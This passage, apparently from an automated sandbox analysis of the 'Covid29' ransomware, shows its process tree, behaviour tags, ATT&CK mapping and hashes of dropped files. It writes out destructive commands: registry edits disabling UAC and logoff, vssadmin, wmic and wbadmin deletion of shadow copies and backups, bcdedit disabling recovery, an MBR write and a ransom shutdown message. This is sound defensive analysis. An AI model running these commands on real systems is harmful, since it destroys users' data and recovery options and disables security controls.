C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:4016
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:4160
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:4252
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:4856
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:1536
-
-
C:\Users\Admin\AppData\Local\Temp\5A6F.tmp\mbr.exembr.exe3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:2300
-
-
C:\Users\Admin\AppData\Local\Temp\5A6F.tmp\Cov29Cry.exeCov29Cry.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1168 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
PID:4860 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete5⤵PID:2264
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:1912
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete6⤵PID:936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no5⤵PID:4872
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵
- Modifies boot configuration data using bcdedit
PID:2776
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no6⤵
- Modifies boot configuration data using bcdedit
PID:4060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet5⤵PID:1564
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet6⤵
- Deletes backup catalog
PID:3820
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt5⤵PID:316
-
-
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"3⤵PID:2084
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 93⤵
- Runs ping.exe
PID:132
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
PID:900
-
-
C:\Users\Admin\AppData\Local\Temp\5A6F.tmp\Cov29LockScreen.exeCov29LockScreen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3128
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Covid29 Ransomware\readme.txt1⤵PID:2160
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2736
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:3200
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:2416
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:540
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:3740
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1736
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3File Deletion
3Modify Registry
3Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d53370728b077f62f2aef32c67ad6e30
SHA177d00d51e815b6ea7203358fa5cced4460b3af16
SHA256d6cf2fd8ff8b2e71c4136d7b52a97dfdad9ff53b309da2ae8f690ca604e98463
SHA512411895c07879f8e4eb094a3a9bfd4f8f2c5e3a1cd84acf66cca2a394da3efa945bf52027598f879101ca4aa80737c6b699ef413d02afba33fbebe43d8f84dd46
-
Filesize
6KB
MD51fcde6b27208c2277254bfda79c8a019
SHA1ffbccedb21e454a4c3087ccd1c3c1932960f0859
SHA2560a03ab6deacf42a6f50583841747bcdd7236d2738643ad02c0d77e5dba082a00
SHA512c1232868eb4ac50d535a1627e715c3ad9b46744e67a5e000191c3e7d5177cc685c49cbb09c087eb021ce4e4d17b4881a9e592cb1e5d7da13af5a459f57031e2d
-
Filesize
6KB
MD5d8d228fae74cbfa8f19c3014cb0ab574
SHA1313ee3115cbba7312ea0de087696cea836ebcc56
SHA256b70996b3abf68a25e40f1ffee456612740fad008b2cd36d6fc5a80b9daae0e34
SHA5124571041d3e0981e8f994f4eacac5264caa0e936c914d43c37b4375e590f6df4e2ee26d7fce72f36085e959ef0bef7425548b8cafaed074b4ae143ac7bc7213e3
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
1KB
MD5014814349f632edc89a9e2e6e4977df4
SHA1ee8bc562093e7825acfd382239c6b89f9eb2c3ae
SHA256a78895044403d5104997d25ad8c6c6533dcdb8cc13acac7da728395a16e7e64f
SHA512bc4d46fa4ad265b6eee3578658f21df8c92993a64da86cd5da192ac7f83bf196c1388a2d1dbfd1316252ac49d6e4edffc2a2015c8c8eefbd6d13ffea322c82c4
-
Filesize
2KB
MD549dfd5f4fb1ac9e6d4f092b61a648fc0
SHA1f42dfdff1e4b6098a218b0df70c53f9b4bab2db3
SHA25633a7ef6c7bc06fae383ceb0d503828784e9b1124dc1375eaf34771b19d1af4c7
SHA512c2da4de6920a3e8e58062d5b069dfb11df659b7c709d16f585da5b48f9353390393c7358985690693816a76e3c7d307c5d9ba9259a4fcb9ed6d388c4e5d92c74
-
Filesize
2KB
MD55ed0df97ea391239d5dfe03faad754d6
SHA14c797b1fc8d19b83eb82b39b78fe60fd4842fd5d
SHA256ff649fa9c1bb926fff54499489c4ea0523a55cfe44e273f71948f75aad0a83b9
SHA51266e549795b6f62c6c927d9519ea64aa5798c3ee9df7ce27d5228e9bf111d2ca739a1de3cd6c8c848979db0d7cbaf700b884a6c490a5d498d0afc7d795c81b4ea
-
Filesize
2KB
MD5f7e0368f0daf36d72a01f01c7ccc33ce
SHA14a2d4abc5bc1055d7763772d67c61c7c2607004b
SHA2560a902a0d25fccad8b298bcac841313cd56e161be0a234671603eb3019a6193a6
SHA512825599ab257c705d57fed29a53b5ab93035b5cd7dadce31f343366f18c1b107a1ac9b65ed5c11124e1af7d46e72e897071821cc4ecc818c3504f45fd1aa22cf8
-
Filesize
2KB
MD56c29e40b255ddab27c7b09978323c3a0
SHA1a420b0ce4efc989c92b90851d346d9090e7fb2ee
SHA256819aaf61b429412e40b3a8d2c9d4e00e11fa6ddaa1664b5158ab22b8856e4ebc
SHA51267c51c93e7e5cab62202edbd39e9e9d32367a9900eb65fd068f9c58667e46961e259cfb8e7d323d909b10c80bcbc675fed3009173c66962fe4061d64bada55c0
-
Filesize
2KB
MD5fa916e87a6e5f3ebd851198a5d6f04a6
SHA193b99bf30391d80299e5b0928ffa1d9d1f75a227
SHA25694660f6423bed5847d7dbe09ae03ce2b762a5d38d2f7a3300fe2fc4d01d0e223
SHA51290c4f773b0b1b36a68b9da92c863292985caf7e89a2cfa35562335d51091f203306b69598fee90f134eab2d182db0bcfad46354e66e019bde82b9ac96e235c42
-
Filesize
7KB
MD523f6cf4bc763e00b7fa251819eb041ec
SHA169cc811deaccfc9fee9475aba97aef181d4fcc30
SHA256e5fb119647cac2c3ab0179cd0c0c9c340fe3ade8ebcc0ade06f5d680a1341c61
SHA512b39325df0359ea8899713038f79c8147e47a953eb0b34cbb00895138fd7a3b8ec5dc08ec00bbc812caf7d1b6837e84da3a340a0e319a318bed933bbf621b4a83
-
Filesize
7KB
MD5682bcdbee47793b9f000443d3c2c022f
SHA1737ee0ff8539a9b9e7ada38fd20b69f4370ef28c
SHA256e63b878e708b8a9fa92eeaea1951c7fc79116f18168f7bb35178e37cfd610014
SHA5126f7bc81efcc2cb48ca1792078753d8fcbf18c0c1b2e8c76c56caa6d1cde57b02a8d13fe198fd57c4c40040721405cd925de27498212fa42df6d8ba5dfcc6dd29
-
Filesize
8KB
MD580f2ea0fbdc511b432494e580a782ff3
SHA1152ca18798792c1113224d1f3602da65585b7f75
SHA25644e7066fd602d74ff3f8b42d9cc662a409b014b419549e1744fbb2ece716eb2c
SHA512e2457fc8fcb13fe5e9a82567b037452d3346511696049e713fd794461d5c84232a8b14f2a70c2d7c97603220918b73862fdd83069df69869d4fb959837cda004
-
Filesize
251KB
MD596eb3ce174ef9077d734a5e3596ca1af
SHA121761c244af6082667c9e86ce1282bec07d268b1
SHA25668d69a6f1b569e21dd928f482ab6b7dcdfb8960aeaf7d7d1bd020664f712d940
SHA5123f12cda2c75d7ac2d363f5a7220c9649b009f2c93f5523958c7f8d61f5dfd9b0abf707d3e80cef0a214b81bb0cbee80469224db323e3b6f7f584db35245bc450
-
Filesize
251KB
MD5ba728465fa121d849b2139aa1f334723
SHA194473c89765a1d7deac4615047b71f25b59b7396
SHA256571f3d6f6845bdc630c188e5cacea3c08f13a3b52f6932571a87cfaf0d230fdc
SHA5121534d7612a834205f89d20c28fd9a9617a8cadd738057ad15c3355c35cb3ecb5a6d0b8e05c12c5a7de8063bb0711caa5d1fc7780d4139aaafe2562eacc7832ec
-
Filesize
251KB
MD5e279348b3b8c545d5f0af5a8d9c47c61
SHA1640f669268d6d0ef7f491a9baa76fa4bdbd5a636
SHA256eb71741343b16945848e7c8d0dbdd6fb64c48170d37182fb11da495751ecbcaa
SHA512907d4d4d7eba5bef47d0f5ada832e0ab21a965ce90c261de00ca01d86a3d9b8e23f80a30d32fc6b994d0b37a404b76aca4d7e1668b20917c62760fd4d9936796
-
Filesize
251KB
MD5f119536e96e6a5403f9fa87250f645a0
SHA1f5314028ce8bfc6b3600193955c1e2e7df6a493d
SHA2563d0d7e814d2a1c85c1953a466d0565d459ea86bd9af6c59e83f86aa70f9ed683
SHA51291e12528a8bce4f0d0e571452158a188eeebf2afda3435f8209abe928b810736fa0adedba445801bf785700f88ad79fe6cae162c798bde19d5f554d2f16513be
-
Filesize
264KB
MD59a802c26a8d60c5b9f84aca26f648ba6
SHA18de053c86b0a55efb27285cf5fa4683174e061ef
SHA256396223084bc28fe06a77b05ad9c6bcdedb5965382eea4b5a740aee1262beebf9
SHA5129b2857a2684ca20ca0bef436ee4d6a3c53343f48258293978240ef2391b7540591c1888e88623c392f32d46ca8fef2e3571dbb23969d3c567879890906c85f5c
-
Filesize
103KB
MD58bcd083e16af6c15e14520d5a0bd7e6a
SHA1c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA51235999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a
-
Filesize
48KB
MD5f724c6da46dc54e6737db821f9b62d77
SHA1e35d5587326c61f4d7abd75f2f0fc1251b961977
SHA2566cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c
SHA5126f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc
-
Filesize
1KB
MD557f0432c8e31d4ff4da7962db27ef4e8
SHA1d5023b3123c0b7fae683588ac0480cd2731a0c5e
SHA256b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc
SHA512bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf
-
Filesize
144B
MD5c0437fe3a53e181c5e904f2d13431718
SHA144f9547e7259a7fb4fe718e42e499371aa188ab6
SHA256f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22
SHA512a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3
-
Filesize
1.3MB
MD535af6068d91ba1cc6ce21b461f242f94
SHA1cb054789ff03aa1617a6f5741ad53e4598184ffa
SHA2569ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
SHA512136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169
-
Filesize
861B
MD5c53dee51c26d1d759667c25918d3ed10
SHA1da194c2de15b232811ba9d43a46194d9729507f0
SHA256dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52
SHA512da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c
-
Filesize
1.7MB
MD5272d3e458250acd2ea839eb24b427ce5
SHA1fae7194da5c969f2d8220ed9250aa1de7bf56609
SHA256bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3
SHA512d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c